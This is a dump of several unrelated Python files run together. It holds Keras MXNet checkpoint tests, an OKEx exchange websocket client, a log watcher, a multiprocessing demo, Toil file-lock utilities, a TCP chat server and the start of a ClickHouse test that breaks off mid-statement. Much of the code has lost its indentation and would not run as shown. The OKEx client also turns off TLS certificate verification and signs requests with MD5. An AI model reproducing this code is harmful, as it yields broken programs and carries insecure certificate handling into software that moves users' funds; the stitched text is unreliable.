assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_max_mode():
mxnet_model_checkpoint_test_helper(monitor='val_acc', save_best_only=False, mode='max')
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_best_max_mode():
mxnet_model_checkpoint_test_helper(monitor='val_acc', save_best_only=True, mode='max', epochs=2)
# Since we say save_best_only, we need to have only one model file with test-0000.params and test-symbol.json
assert not os.path.isfile('test-0001.params')
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
@pytest.mark.skipif((K.backend() != 'mxnet'),
reason='Supported for MXNet backend only.')
def test_mxnet_model_checkpoint_save_all_auto_mode_multi_epoch():
mxnet_model_checkpoint_test_helper(monitor='val_acc', save_best_only=False, mode='auto', epochs=2)
assert os.path.isfile('test-symbol.json')
assert os.path.isfile('test-0000.params')
assert os.path.isfile('test-0001.params')
os.remove('test-symbol.json')
os.remove('test-0000.params')
os.remove('test-0001.params')
if __name__ == '__main__':
pytest.main([__file__])
|
vnokex.py
|
# encoding: UTF-8
from __future__ import print_function
import ssl
import hashlib
import json
import traceback
from threading import Thread
from time import sleep
import websocket
from func import *
# Constant definitions
OKEX_SPOT_HOST = 'wss://real.okex.com:10441/websocket'
OKEX_FUTURE_HOST = 'wss://real.okex.com:10440/websocket'
SPOT_CURRENCY = ["usdt",
"btc",
"ltc",
"eth",
"etc",
"bch", "eos"]
SPOT_SYMBOL = ["ltc_btc",
"eth_btc",
"etc_btc",
"bch_btc",
"btc_usdt",
"eth_usdt",
"ltc_usdt",
"etc_usdt",
"bch_usdt",
"etc_eth",
"bt1_btc",
"bt2_btc",
"btg_btc",
"qtum_btc",
"hsr_btc",
"neo_btc",
"gas_btc",
"qtum_usdt",
"hsr_usdt",
"neo_usdt",
"gas_usdt", "eos_usdt"]
KLINE_PERIOD = ["1min",
"3min",
"5min",
"15min",
"30min",
"1hour",
"2hour",
"4hour",
"6hour",
"12hour",
"day",
"3day",
"week"]
########################################################################
class OkexApi(object):
    """Base trading interface"""
    #----------------------------------------------------------------------
    def __init__(self):
        """Constructor"""
        self.host = ''                   # server address
        self.apiKey = ''                 # API key
        self.secretKey = ''              # secret key
        self.active = False              # working state
        self.ws = None                   # websocket application object
        self.wsThread = None             # websocket worker thread
        self.heartbeatCount = 0          # heartbeat counter
        self.heartbeatThread = None      # heartbeat thread
        self.heartbeatReceived = True    # whether the last heartbeat was answered
        self.reconnecting = False        # reconnection in progress
#----------------------------------------------------------------------
def heartbeat(self):
""""""
while self.active:
self.heartbeatCount += 1
if self.heartbeatCount < 10:
sleep(1)
else:
self.heartbeatCount = 0
if not self.heartbeatReceived:
self.reconnect()
else:
self.heartbeatReceived = False
d = {'event': 'ping'}
j = json.dumps(d)
try:
self.ws.send(j)
except:
msg = traceback.format_exc()
self.onError(msg)
self.reconnect()
#----------------------------------------------------------------------
def reconnect(self):
"""重新连接"""
if not self.reconnecting:
self.reconnecting = True
            self.closeWebsocket()    # close the previous connection first
self.initWebsocket()
self.reconnecting = False
#----------------------------------------------------------------------
def connect(self, host, apiKey, secretKey, trace=False):
"""连接"""
self.host = host
self.apiKey = apiKey
self.secretKey = secretKey
websocket.enableTrace(trace)
self.initWebsocket()
self.active = True
#----------------------------------------------------------------------
def initWebsocket(self):
""""""
self.ws = websocket.WebSocketApp(self.host,
on_message=self.onMessageCallback,
on_error=self.onErrorCallback,
on_close=self.onCloseCallback,
on_open=self.onOpenCallback)
kwargs = {'sslopt': {'cert_reqs': ssl.CERT_NONE}}
self.wsThread = Thread(target=self.ws.run_forever, kwargs=kwargs)
self.wsThread.start()
#----------------------------------------------------------------------
def readData(self, evt):
"""解码推送收到的数据"""
data = json.loads(evt)
return data
#----------------------------------------------------------------------
def closeHeartbeat(self):
"""关闭接口"""
        if self.heartbeatThread and self.heartbeatThread.is_alive():
self.active = False
self.heartbeatThread.join()
#----------------------------------------------------------------------
def closeWebsocket(self):
"""关闭WS"""
        if self.wsThread and self.wsThread.is_alive():
self.ws.close()
self.wsThread.join()
#----------------------------------------------------------------------
def close(self):
""""""
self.closeHeartbeat()
self.closeWebsocket()
#----------------------------------------------------------------------
def onMessage(self, data):
"""信息推送"""
print('onMessage')
print(data)
#----------------------------------------------------------------------
def onError(self, data):
"""错误推送"""
print('onError')
print(data)
#----------------------------------------------------------------------
def onClose(self):
"""接口断开"""
print('onClose')
#----------------------------------------------------------------------
def onOpen(self):
"""接口打开"""
print('onOpen')
#----------------------------------------------------------------------
def onMessageCallback(self, evt):
""""""
data = self.readData(evt)
if 'event' in data:
self.heartbeatReceived = True
else:
self.onMessage(data[0])
#----------------------------------------------------------------------
def onErrorCallback(self, evt):
""""""
self.onError(evt)
#----------------------------------------------------------------------
#def onCloseCallback(self, ws):
def onCloseCallback(self):
""""""
self.onClose()
#----------------------------------------------------------------------
#def onOpenCallback(self, ws):
def onOpenCallback(self):
""""""
if not self.heartbeatThread:
self.heartbeatThread = Thread(target=self.heartbeat)
self.heartbeatThread.start()
self.onOpen()
#----------------------------------------------------------------------
def generateSign(self, params):
"""生成签名"""
l = []
for key in sorted(params.keys()):
l.append('%s=%s' %(key, params[key]))
l.append('secret_key=%s' %self.secretKey)
sign = '&'.join(l)
return hashlib.md5(sign.encode('utf-8')).hexdigest().upper()
#----------------------------------------------------------------------
def sendRequest(self, channel, params=None):
"""发送请求"""
        # Build the request
d = {}
d['event'] = 'addChannel'
d['channel'] = channel
        # If there are parameters, add the api_key and signature fields to them
if params is not None:
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
d['parameters'] = params
        # Serialize with JSON and send
j = json.dumps(d)
        # Reconnect if sending raises an exception
try:
self.ws.send(j)
return True
except websocket.WebSocketConnectionClosedException:
self.reconnect()
return False
#----------------------------------------------------------------------
def login(self):
params = {}
params['api_key'] = self.apiKey
params['sign'] = self.generateSign(params)
        # Build the request
d = {}
d['event'] = 'login'
d['parameters'] = params
j = json.dumps(d)
        # Reconnect if sending raises an exception
try:
self.ws.send(j)
return True
except websocket.WebSocketConnectionClosedException:
self.reconnect()
return False
########################################################################
class OkexSpotApi(OkexApi):
"""现货交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexSpotApi, self).__init__()
#----------------------------------------------------------------------
def subscribeSpotTicker(self, symbol):
"""订阅现货的Tick"""
channel = 'ok_sub_spot_%s_ticker' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDepth(self, symbol, depth=0):
"""订阅现货的深度"""
channel = 'ok_sub_spot_%s_depth' %symbol
if depth:
channel = channel + '_' + str(depth)
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotDeals(self, symbol):
channel = 'ok_sub_spot_%s_deals' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeSpotKlines(self, symbol, period):
channel = 'ok_sub_spot_%s_kline_%s' %(symbol, period)
self.sendRequest(channel)
#----------------------------------------------------------------------
def spotOrder(self, symbol, type_, price, amount):
"""现货委托"""
params = {}
params['symbol'] = str(symbol)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
channel = 'ok_spot_order'
return self.sendRequest(channel, params)
#----------------------------------------------------------------------
def spotCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_cancel_order'
self.sendRequest(channel, params)
#----------------------------------------------------------------------
def spotUserInfo(self):
"""查询现货账户"""
channel = 'ok_spot_userinfo'
self.sendRequest(channel, {})
#----------------------------------------------------------------------
def spotOrderInfo(self, symbol, orderid):
"""查询现货委托信息"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
channel = 'ok_spot_orderinfo'
self.sendRequest(channel, params)
#----------------------------------------------------------------------
def subSpotOrder(self, symbol):
"""订阅委托推送"""
channel = 'ok_sub_spot_%s_order' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subSpotBalance(self, symbol):
"""订阅资金推送"""
channel = 'ok_sub_spot_%s_balance' %symbol
self.sendRequest(channel)
########################################################################
class OkexFutureApi(OkexApi):
"""现货交易接口"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
super(OkexFutureApi, self).__init__()
#----------------------------------------------------------------------
def subscribeFutureTicker(self, symbol):
"""订阅现货的Tick"""
symbol = symbol.split('_')[0]
channel = 'ok_sub_futureusd_%s_ticker_this_week' %symbol
self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeFutureDepth(self, symbol, depth=0):
"""订阅现货的深度"""
symbol = symbol.split('_')[0]
channel = 'ok_sub_futureusd_%s_depth_this_week' %symbol
if depth:
channel = channel + '_' + str(depth)
self.sendRequest(channel)
#----------------------------------------------------------------------
#def subscribeSpotDeals(self, symbol):
# channel = 'ok_sub_spot_%s_deals' %symbol
# self.sendRequest(channel)
#----------------------------------------------------------------------
def subscribeFutureKlines(self, symbol, period):
symbol = symbol.split('_')[0]
channel = 'ok_sub_futureusd_%s_kline_%s_this_week' %(symbol, period)
self.sendRequest(channel)
#----------------------------------------------------------------------
def futureOrder(self, symbol, type_, price, amount, match_price = '1'):
"""现货委托"""
params = {}
params['symbol'] = str(symbol)
params['type'] = str(type_)
params['price'] = str(price)
params['amount'] = str(amount)
params['match_price'] = match_price
params['contract_type'] = 'this_week'
futureTrade(params)
#return self.sendRequest(channel, params)
#----------------------------------------------------------------------
def futureCancelOrder(self, symbol, orderid):
"""现货撤单"""
params = {}
params['symbol'] = str(symbol)
params['order_id'] = str(orderid)
params['contract_type'] = 'this_week'
futureCancel(params)
#channel = 'ok_spot_cancel_order'
#self.sendRequest(channel, params)
#----------------------------------------------------------------------
def futureUserInfo(self):
"""查询现货账户"""
channel = 'ok_sub_futureusd_userinfo'
self.sendRequest(channel, {})
#----------------------------------------------------------------------
# def spotOrderInfo(self, symbol, orderid):
# """查询现货委托信息"""
# params = {}
# params['symbol'] = str(symbol)
# params['order_id'] = str(orderid)
# channel = 'ok_spot_orderinfo'
# self.sendRequest(channel, params)
# #----------------------------------------------------------------------
# def subSpotOrder(self, symbol):
# """订阅委托推送"""
# channel = 'ok_sub_spot_%s_order' %symbol
# self.sendRequest(channel)
# #----------------------------------------------------------------------
# def subSpotBalance(self, symbol):
# """订阅资金推送"""
# channel = 'ok_sub_spot_%s_balance' %symbol
# self.sendRequest(channel)
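#----------------------------------------------------------------------
# Minimal usage sketch (illustrative only): the API key and secret below are
# placeholders, and only methods defined above are exercised.
if __name__ == '__main__':
    api = OkexSpotApi()
    api.connect(OKEX_SPOT_HOST, 'your-api-key', 'your-secret-key', trace=False)
    sleep(3)                               # give the websocket time to open
    api.subscribeSpotTicker('btc_usdt')    # ticker pushes arrive via onMessage
    sleep(10)
    api.close()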
|
LogWatcher.py
|
import sys
import time
import errno
import os
import signal
import threading
class LogWatcher:
def __init__(self, logPath, logFunc):
self.thread = threading.Thread(target=self.update)
# Setting daemon to true will kill the thread if the main
# thread aborts (eg. user hitting ctrl+c)
self.thread.daemon = True
self.logPath = logPath
self.logFunc = logFunc
self.killed = False
self.isDone = False
def start(self):
self.thread.start()
def stop(self):
self.killed = True
def update(self):
# Wait until file exists
while True:
if self.killed:
return
if os.path.isfile(self.logPath):
break
time.sleep(1)
with open(self.logPath, 'r', encoding='utf-8', errors='ignore') as logFile:
logFile.seek(0,2)
while not self.killed:
try:
where = logFile.tell()
except:
time.sleep(0.1)
continue
line = logFile.readline()
if not line:
time.sleep(1)
logFile.seek(where)
else:
self.logFunc(line.strip())
# Make sure we get the rest of the log before quitting
while True:
line = logFile.readline()
if not line:
break
self.logFunc(line.strip())
self.isDone = True
def onLog(logStr):
print(logStr)
if __name__ == '__main__':
import msvcrt
if len(sys.argv) != 2:
print("Invalid # of arguments")
exit(-1)
path = sys.argv[1]
log = LogWatcher(path, onLog)
log.start()
while 1:
if msvcrt.kbhit():
key = msvcrt.getch().decode('UTF-8')
if ord(key) == 27:
sys.exit()
if key == 'c':
os.system('cls')
time.sleep(0.1)
log.stop()
|
1.4.1.4.py
|
# Inter-process communication with multiprocessing.Queue
from multiprocessing import Process, Queue
import os, time, random
# Code executed by the writer processes:
def proc_write(q,urls):
print('Process(%s) is writing...' % os.getpid())
for url in urls:
q.put(url)
print('Put %s to queue...' % url)
time.sleep(random.random())
# Code executed by the reader process:
def proc_read(q):
print('Process(%s) is reading...' % os.getpid())
while True:
url = q.get(True)
print('Get %s from queue.' % url)
if __name__=='__main__':
    # The parent process creates the Queue and passes it to each child process:
q = Queue()
proc_writer1 = Process(target=proc_write, args=(q,['url_1', 'url_2', 'url_3']))
proc_writer2 = Process(target=proc_write, args=(q,['url_4','url_5','url_6']))
proc_reader = Process(target=proc_read, args=(q,))
    # Start the writer child processes:
proc_writer1.start()
proc_writer2.start()
    # Start the reader child process:
proc_reader.start()
    # Wait for the writer processes to finish:
proc_writer1.join()
proc_writer2.join()
    # proc_reader loops forever and can never finish on its own, so terminate it forcibly:
proc_reader.terminate()
'''
Process(3320) is writing...
Put url_1 to queue...
Process(3321) is writing...
Put url_4 to queue...
Process(3322) is reading...
Get url_1 from queue.
Get url_4 from queue.
Put url_5 to queue...
Get url_5 from queue.
Put url_6 to queue...
Get url_6 from queue.
Put url_2 to queue...
Get url_2 from queue.
Put url_3 to queue...
Get url_3 from queue.
'''
|
threading.py
|
# Copyright (C) 2015-2021 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# 5.14.2018: copied into Toil from https://github.com/BD2KGenomics/bd2k-python-lib
# Note: renamed from "threading.py" to "threading.py" to avoid conflicting imports
# from the built-in "threading" from psutil in python3.9
import atexit
import fcntl
import logging
import math
import os
import sys
import tempfile
import threading
import traceback
from contextlib import contextmanager
from typing import Any, Dict, Iterator, Optional
import psutil # type: ignore
from toil.lib.exceptions import raise_
from toil.lib.io import robust_rmtree
logger = logging.getLogger(__name__)
class ExceptionalThread(threading.Thread):
"""
    A thread whose join() method re-raises exceptions raised during run(). While join() is
    idempotent, the exception is only re-raised during the first invocation of join() that
    successfully joined the thread. If join() times out, no exception will be re-raised even
    though an exception might already have occurred in run().
    When subclassing this thread, override tryRun() instead of run().
>>> def f():
... assert 0
>>> t = ExceptionalThread(target=f)
>>> t.start()
>>> t.join()
Traceback (most recent call last):
...
AssertionError
>>> class MyThread(ExceptionalThread):
... def tryRun( self ):
... assert 0
>>> t = MyThread()
>>> t.start()
>>> t.join()
Traceback (most recent call last):
...
AssertionError
"""
exc_info = None
def run(self) -> None:
try:
self.tryRun()
except:
self.exc_info = sys.exc_info()
raise
def tryRun(self) -> None:
super().run()
def join(self, *args: Optional[float], **kwargs: Optional[float]) -> None:
super().join(*args, **kwargs)
if not self.is_alive() and self.exc_info is not None:
exc_type, exc_value, traceback = self.exc_info
self.exc_info = None
raise_(exc_type, exc_value, traceback)
def cpu_count() -> Any:
"""
Get the rounded-up integer number of whole CPUs available.
Counts hyperthreads as CPUs.
Uses the system's actual CPU count, or the current v1 cgroup's quota per
period, if the quota is set.
Ignores the cgroup's cpu shares value, because it's extremely difficult to
interpret. See https://github.com/kubernetes/kubernetes/issues/81021.
Caches result for efficiency.
:return: Integer count of available CPUs, minimum 1.
:rtype: int
"""
cached = getattr(cpu_count, 'result', None)
if cached is not None:
# We already got a CPU count.
return cached
# Get the fallback answer of all the CPUs on the machine
total_machine_size = psutil.cpu_count(logical=True)
logger.debug('Total machine size: %d cores', total_machine_size)
try:
with open('/sys/fs/cgroup/cpu/cpu.cfs_quota_us') as stream:
# Read the quota
quota = int(stream.read())
logger.debug('CPU quota: %d', quota)
if quota == -1:
# Assume we can use the whole machine
return total_machine_size
with open('/sys/fs/cgroup/cpu/cpu.cfs_period_us') as stream:
# Read the period in which we are allowed to burn the quota
period = int(stream.read())
logger.debug('CPU quota period: %d', period)
        # The thread count is how many multiples of a wall clock period we can burn in that period.
cgroup_size = int(math.ceil(float(quota)/float(period)))
logger.debug('Cgroup size in cores: %d', cgroup_size)
except:
# We can't actually read these cgroup fields. Maybe we are a mac or something.
logger.debug('Could not inspect cgroup: %s', traceback.format_exc())
cgroup_size = float('inf') # type: ignore
# Return the smaller of the actual thread count and the cgroup's limit, minimum 1.
result = max(1, min(cgroup_size, total_machine_size))
logger.debug('cpu_count: %s', str(result))
# Make sure to remember it for the next call
setattr(cpu_count, 'result', result)
return result
# PIDs are a bad identifier, because they are not shared between containers
# and also may be reused.
# So instead we have another system for file store implementations to
# coordinate among themselves, based on file locks.
# TODO: deduplicate with DeferredFunctionManager?
# TODO: Wrap in a class as static methods?
# Note that we don't offer a way to enumerate these names. You can only get
# your name and poll others' names (or your own). So we don't have
# distinguishing prefixes or WIP suffixes to allow for enumeration.
# We keep one name per unique base directory (probably a Toil coordination
# directory).
# We have a global lock to control looking things up
current_process_name_lock = threading.Lock()
# And a global dict from work directory to name in that work directory.
# We also have a file descriptor per work directory but it is just leaked.
current_process_name_for: Dict[str, str] = {}
def collect_process_name_garbage() -> None:
"""
Delete all the process names that point to files that don't exist anymore
(because the work directory was temporary and got cleaned up). This is
known to happen during the tests, which get their own temp directories.
Caller must hold current_process_name_lock.
"""
global current_process_name_for
# Collect the base_dirs of the missing names to delete them after iterating.
missing = []
for base_dir, name in current_process_name_for.items():
if not os.path.exists(os.path.join(base_dir, name)):
# The name file is gone, probably because the work dir is gone.
missing.append(base_dir)
for base_dir in missing:
del current_process_name_for[base_dir]
def destroy_all_process_names() -> None:
"""
Delete all our process name files because our process is going away.
We let all our FDs get closed by the process death.
We assume there is nobody else using the system during exit to race with.
"""
global current_process_name_for
for base_dir, name in current_process_name_for.items():
robust_rmtree(os.path.join(base_dir, name))
# Run the cleanup at exit
atexit.register(destroy_all_process_names)
def get_process_name(base_dir: str) -> str:
"""
Return the name of the current process. Like a PID but visible between
    containers on what appears to Toil to be a single node.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:return: Process's assigned name
:rtype: str
"""
global current_process_name_lock
global current_process_name_for
with current_process_name_lock:
# Make sure all the names still exist.
# TODO: a bit O(n^2) in the number of base_dirs in flight at any one time.
collect_process_name_garbage()
if base_dir in current_process_name_for:
# If we already gave ourselves a name, return that.
return current_process_name_for[base_dir]
# We need to get a name file.
nameFD, nameFileName = tempfile.mkstemp(dir=base_dir)
# Lock the file. The lock will automatically go away if our process does.
try:
fcntl.lockf(nameFD, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError as e:
# Someone else might have locked it even though they should not have.
raise RuntimeError("Could not lock process name file {}: {}".format(nameFileName, str(e)))
# Save the basename
current_process_name_for[base_dir] = os.path.basename(nameFileName)
# Return the basename
return current_process_name_for[base_dir]
# TODO: we leave the file open forever. We might need that in order for
# it to stay locked while we are alive.
def process_name_exists(base_dir: str, name: str) -> bool:
"""
Return true if the process named by the given name (from process_name) exists, and false otherwise.
Can see across container boundaries using the given node workflow directory.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:param str name: Process's name to poll
:return: True if the named process is still alive, and False otherwise.
:rtype: bool
"""
global current_process_name_lock
global current_process_name_for
with current_process_name_lock:
if current_process_name_for.get(base_dir, None) == name:
# We are asking about ourselves. We are alive.
return True
# Work out what the corresponding file name is
nameFileName = os.path.join(base_dir, name)
if not os.path.exists(nameFileName):
# If the file is gone, the process can't exist.
return False
nameFD = None
try:
# Otherwise see if we can lock it shared, for which we need an FD, but
# only for reading.
nameFD = os.open(nameFileName, os.O_RDONLY)
try:
fcntl.lockf(nameFD, fcntl.LOCK_SH | fcntl.LOCK_NB)
except OSError as e:
# Could not lock. Process is alive.
return True
else:
# Could lock. Process is dead.
# Remove the file. We race to be the first to do so.
try:
os.remove(nameFileName)
except:
pass
# Unlock
fcntl.lockf(nameFD, fcntl.LOCK_UN)
# Report process death
return False
finally:
if nameFD is not None:
try:
os.close(nameFD)
except:
pass
# Similar to the process naming system above, we define a global mutex system
# for critical sections, based just around file locks.
@contextmanager
def global_mutex(base_dir: str, mutex: str) -> Iterator[None]:
"""
Context manager that locks a mutex. The mutex is identified by the given
name, and scoped to the given directory. Works across all containers that
    have access to the given directory. Mutexes held by dead processes are
automatically released.
Only works between processes, NOT between threads.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:param str mutex: Mutex to lock. Must be a permissible path component.
"""
# Define a filename
lock_filename = os.path.join(base_dir, 'toil-mutex-' + mutex)
logger.debug('PID %d acquiring mutex %s', os.getpid(), lock_filename)
# We can't just create/open and lock a file, because when we clean up
# there's a race where someone can open the file before we unlink it and
# get a lock on the deleted file.
while True:
# Try to create the file, ignoring if it exists or not.
fd = os.open(lock_filename, os.O_CREAT | os.O_WRONLY)
# Wait until we can exclusively lock it.
fcntl.lockf(fd, fcntl.LOCK_EX)
# Holding the lock, make sure we are looking at the same file on disk still.
fd_stats = os.fstat(fd)
try:
path_stats: Optional[os.stat_result] = os.stat(lock_filename)
except FileNotFoundError:
path_stats = None
if path_stats is None or fd_stats.st_dev != path_stats.st_dev or fd_stats.st_ino != path_stats.st_ino:
# The file we have a lock on is not the file linked to the name (if
# any). This usually happens, because before someone releases a
# lock, they delete the file. Go back and contend again. TODO: This
# allows a lot of queue jumping on our mutex.
fcntl.lockf(fd, fcntl.LOCK_UN)
os.close(fd)
continue
else:
# We have a lock on the file that the name points to. Since we
# hold the lock, nobody will be deleting it or can be in the
# process of deleting it. Stop contending; we have the mutex.
break
try:
# When we have it, do the thing we are protecting.
logger.debug('PID %d now holds mutex %s', os.getpid(), lock_filename)
yield
finally:
# Delete it while we still own it, so we can't delete it from out from
# under someone else who thinks they are holding it.
logger.debug('PID %d releasing mutex %s', os.getpid(), lock_filename)
os.unlink(lock_filename)
fcntl.lockf(fd, fcntl.LOCK_UN)
# Note that we are unlinking it and then unlocking it; a lot of people
# might have opened it before we unlinked it and will wake up when they
# get the worthless lock on the now-unlinked file. We have to do some
# stat gymnastics above to work around this.
os.close(fd)
class LastProcessStandingArena:
"""
Class that lets a bunch of processes detect and elect a last process
standing.
    Processes enter and leave (sometimes due to sudden failure). We
    guarantee that the last process to leave, if it leaves properly, will get a
    chance to do some cleanup. If new processes try to enter during the
    cleanup, they will be delayed until after the cleanup has happened and the
    previous "last" process has finished leaving.
    The user is responsible for making sure that every process which enters also leaves!
Consider using a try/finally; this class is not a context manager.
"""
def __init__(self, base_dir: str, name: str) -> None:
"""
Connect to the arena specified by the given base_dir and name.
Any process that can access base_dir, in any container, can connect to
the arena. Many arenas can be active with different names.
Doesn't enter or leave the arena.
:param str base_dir: Base directory to work in. Defines the shared namespace.
:param str name: Name of the arena. Must be a permissible path component.
"""
# Save the base_dir which namespaces everything
self.base_dir = base_dir
# We need a mutex name to allow only one process to be entering or
# leaving at a time.
self.mutex = name + '-arena-lock'
# We need a way to track who is actually in, and who was in but died.
# So everybody gets a locked file (again).
# TODO: deduplicate with the similar logic for process names, and also
# deferred functions.
self.lockfileDir = os.path.join(base_dir, name + '-arena-members')
# When we enter the arena, we fill this in with the FD of the locked
# file that represents our presence.
self.lockfileFD = None
# And we fill this in with the file name
self.lockfileName = None
def enter(self) -> None:
"""
This process is entering the arena. If cleanup is in progress, blocks
until it is finished.
You may not enter the arena again before leaving it.
"""
logger.debug('Joining arena %s', self.lockfileDir)
# Make sure we're not in it already.
assert self.lockfileName is None
assert self.lockfileFD is None
with global_mutex(self.base_dir, self.mutex):
# Now nobody else should also be trying to join or leave.
try:
# Make sure the lockfile directory exists.
os.mkdir(self.lockfileDir)
except FileExistsError:
pass
# Make ourselves a file in it and lock it to prove we are alive.
self.lockfileFD, self.lockfileName = tempfile.mkstemp(dir=self.lockfileDir) # type: ignore
# Nobody can see it yet, so lock it right away
fcntl.lockf(self.lockfileFD, fcntl.LOCK_EX) # type: ignore
# Now we're properly in, so release the global mutex
logger.debug('Now in arena %s', self.lockfileDir)
def leave(self) -> Iterator[bool]:
"""
This process is leaving the arena. If this process happens to be the
last process standing, yields something, with other processes blocked
from joining the arena until the loop body completes and the process
has finished leaving. Otherwise, does not yield anything.
Should be used in a loop:
for _ in arena.leave():
# If we get here, we were the last process. Do the cleanup
pass
"""
# Make sure we're in it to start.
assert self.lockfileName is not None
assert self.lockfileFD is not None
logger.debug('Leaving arena %s', self.lockfileDir)
with global_mutex(self.base_dir, self.mutex):
# Now nobody else should also be trying to join or leave.
# Take ourselves out.
try:
os.unlink(self.lockfileName)
except:
pass
self.lockfileName = None
fcntl.lockf(self.lockfileFD, fcntl.LOCK_UN)
os.close(self.lockfileFD)
self.lockfileFD = None
for item in os.listdir(self.lockfileDir):
# There is someone claiming to be here. Are they alive?
full_path = os.path.join(self.lockfileDir, item)
fd = os.open(full_path, os.O_RDONLY)
try:
fcntl.lockf(fd, fcntl.LOCK_SH | fcntl.LOCK_NB)
except OSError as e:
# Could not lock. It's alive!
break
else:
# Could lock. Process is dead.
try:
os.remove(full_path)
except:
pass
fcntl.lockf(fd, fcntl.LOCK_UN)
# Continue with the loop normally.
else:
# Nothing alive was found. Nobody will come in while we hold
# the global mutex, so we are the Last Process Standing.
logger.debug('We are the Last Process Standing in arena %s', self.lockfileDir)
yield True
try:
# Delete the arena directory so as to leave nothing behind.
os.rmdir(self.lockfileDir)
except:
logger.warning('Could not clean up arena %s completely: %s',
self.lockfileDir, traceback.format_exc())
# Now we're done, whether we were the last one or not, and can
# release the mutex.
logger.debug('Now out of arena %s', self.lockfileDir)
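# Minimal self-exercise sketch (illustrative only): runs the naming, mutex and
# arena machinery against a throwaway directory; the 'demo' names are arbitrary.
if __name__ == '__main__':
    demo_dir = tempfile.mkdtemp()
    me = get_process_name(demo_dir)
    assert process_name_exists(demo_dir, me)
    with global_mutex(demo_dir, 'demo-mutex'):
        logger.debug('Process %s holds the demo mutex', me)
    arena = LastProcessStandingArena(demo_dir, 'demo')
    arena.enter()
    try:
        pass  # ... work shared by every participating process would go here ...
    finally:
        for _ in arena.leave():
            logger.debug('We were the last process standing in the demo arena')
    robust_rmtree(demo_dir)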
|
multiChatServer.py
|
""" Script for TCP chat server - relays messages to all clients """
from socket import AF_INET, socket, SOCK_STREAM
from threading import Thread
clients = {}
addresses = {}
HOST = "0.0.0.0"
PORT = 2333
BUFSIZ = 1000000
ADDR = (HOST, PORT)
SOCK = socket(AF_INET, SOCK_STREAM)
SOCK.bind(ADDR)
def accept_incoming_connections():
"""Sets up handling for incoming clients."""
while True:
client, client_address = SOCK.accept()
print("%s:%s has connected." % client_address)
client.send("Greetings from the ChatRoom! ".encode("utf8"))
client.send("Now type your name and press enter!".encode("utf8"))
addresses[client] = client_address
Thread(target=handle_client, args=(client, client_address)).start()
def handle_client(conn, addr): # Takes client socket as argument.
"""Handles a single client connection."""
name = conn.recv(BUFSIZ).decode("utf8")
msg = "%s from [%s] has joined the chat!" % (
name, "{}:{}".format(addr[0], addr[1]))
broadcast(bytes(msg, "utf8"))
clients[conn] = name
try:
while True:
msg = conn.recv(BUFSIZ)
if msg != bytes("#quit", "utf8"):
broadcast(msg, name + ": ")
else:
conn.send(bytes("#quit", "utf8"))
conn.close()
del clients[conn]
print("[Leaving]"+str(name))
broadcast(bytes("%s has left the chat." % name, "utf8"))
break
except:
print(str(addr) + " disconnected with exception")
conn.close()
def broadcast(msg, prefix=""): # prefix is for name identification.
"""Broadcasts a message to all the clients."""
for sock in clients:
print("[Broadcast]" + str(prefix) + str(msg))
sock.send(bytes(prefix, "utf8") + msg)
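def demo_client(host="127.0.0.1", port=PORT, name="guest"):
    """Minimal client sketch (illustrative only) showing the protocol the server
    expects: the first message sent is the display name, later messages are
    broadcast to everyone, and "#quit" ends the session."""
    client_sock = socket(AF_INET, SOCK_STREAM)
    client_sock.connect((host, port))
    print(client_sock.recv(BUFSIZ).decode("utf8"))  # greeting from the server
    client_sock.send(bytes(name, "utf8"))           # register our display name
    client_sock.send(bytes("hello everyone", "utf8"))
    client_sock.send(bytes("#quit", "utf8"))        # ask the server to drop us
    client_sock.close()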
if __name__ == "__main__":
    SOCK.listen(100)  # Allow a backlog of up to 100 queued connections.
print("Chat Server has Started !!")
print("Waiting for connections...")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start() # Starts the infinite loop.
ACCEPT_THREAD.join()
SOCK.close()
|
test.py
|
from contextlib import contextmanager
## sudo -H pip install PyMySQL
import pymysql.cursors
import pytest
import time
import threading
from helpers.cluster import ClickHouseCluster
from helpers.client import QueryRuntimeException
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1', main_configs=['configs/remote_servers.xml', 'configs/named_collections.xml'], with_mysql=True)
node2 = cluster.add_instance('node2', main_configs=['configs/remote_servers.xml'], with_mysql_cluster=True)
node3 = cluster.add_instance('node3', main_configs=['configs/remote_servers.xml'], user_configs=['configs/users.xml'], with_mysql=True)
create_table_sql_template = """
CREATE TABLE `clickhouse`.`{}` (
`id` int(11) NOT NULL,
`name` varchar(50) NOT NULL,
`age` int NOT NULL default 0,
`money` int NOT NULL default 0,
`source` enum('IP','URL') DEFAULT 'IP',
